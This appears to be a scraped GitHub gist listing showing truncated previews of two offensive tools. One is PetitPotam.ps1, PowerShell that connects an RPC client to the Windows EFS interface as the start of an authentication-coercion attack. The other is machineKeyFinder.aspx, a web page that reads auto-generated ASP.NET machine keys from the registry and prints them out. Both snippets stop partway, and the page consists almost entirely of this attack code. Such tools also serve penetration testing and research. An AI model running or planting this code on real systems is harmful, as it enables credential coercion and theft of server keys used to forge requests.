metac0rtex
leechristensen
/ PetitPotam.ps1
Created
July 30, 2021 21:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Install-Module NtObjectManager | |
| Import-Module NtObjectManager | |
| $Servers = Get-RpcServer -Path C:\Windows\system32\efssvc.dll ` | |
| -DbgHelpPath 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll' | |
| $EfsInterace = $Servers | Where-Object { $_.InterfaceId -eq 'df1941c5-fe89-4e79-bf10-463657acf44d' } | |
| $client = Get-RpcClient -Server $EfsInterace | |
| $client.Connect() |
irsdl
/ machineKeyFinder.aspx
Last active
April 26, 2024 07:31
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="C#" %> | |
| <% | |
| // Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
| Response.Write("<br/><hr/>"); | |
| byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
| if(autoGenKeyV4!=null) | |
| Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
| Response.Write("<br/>"); | |
| byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
| if(autoGenKey!=null) |